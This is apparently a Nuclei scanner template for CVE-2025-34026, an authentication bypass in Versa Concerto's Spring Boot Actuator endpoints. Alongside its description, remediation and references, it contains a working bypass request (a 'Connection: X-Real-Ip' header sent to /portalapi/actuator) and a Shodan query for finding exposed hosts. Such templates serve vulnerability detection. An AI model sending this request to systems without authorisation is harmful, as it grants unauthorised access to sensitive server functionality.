id: CVE-2025-34026 info: name: Versa Concerto Actuator Endpoint - Authentication Bypass author: iamnoooob,rootxharsh,parthmalhotra,pdresearch severity: critical description: | An authentication bypass vulnerability affected the Spring Boot Actuator endpoints in Versa Concerto due to improper handling of the X-Real-Ip header.Attackers could access restricted endpoints by omitting this header.The issue allowed unauthorized access to sensitive functionality, highlighting the need for proper header validation. impact: | Attackers can bypass authentication by omitting the X-Real-Ip header to access restricted Spring Boot Actuator endpoints, potentially exposing sensitive system information and functionality. remediation: | Upgrade to the latest Versa Concerto version that properly validates authentication for all Actuator endpoints regardless of header presence. reference: - https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce/ - https://security-portal.versa-networks.com/emailbulletins/6830f94328defa375486ff2e - https://www.cve.org/CVERecord?id=CVE-2025-34026 classification: cve-id: CVE-2025-34026 cwe-id: CWE-288 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 epss-score: 0.71079 epss-percentile: 0.98736 cpe: cpe:2.3:a:versa-networks:concerto:*:*:*:*:*:*:*:* metadata: verified: true vendor: versa-networks product: concerto max-request: 1 shodan-query: http.favicon.hash:-534530225 tags: versa,concerto,actuator,auth-bypass,springboot,cve,cve2025,vkev,vuln,kev http: - raw: - | GET /portalapi/actuator HTTP/1.1 Host: {{Hostname}} Connection: X-Real-Ip matchers-condition: and matchers: - type: word part: body words: - heapdump - type: word part: header words: - EECP-CSRF-TOKEN # digest: 4a0a0047304502206e189086fd521b128cd1b4244049013c2f05c625aa391f4982315af97d86b3f4022100f6cfcac653db6e82d8f1564bef1b0bc9c31c36d32416a3250491facdc2c8e125:922c64590222798bb761d5b6d8e72950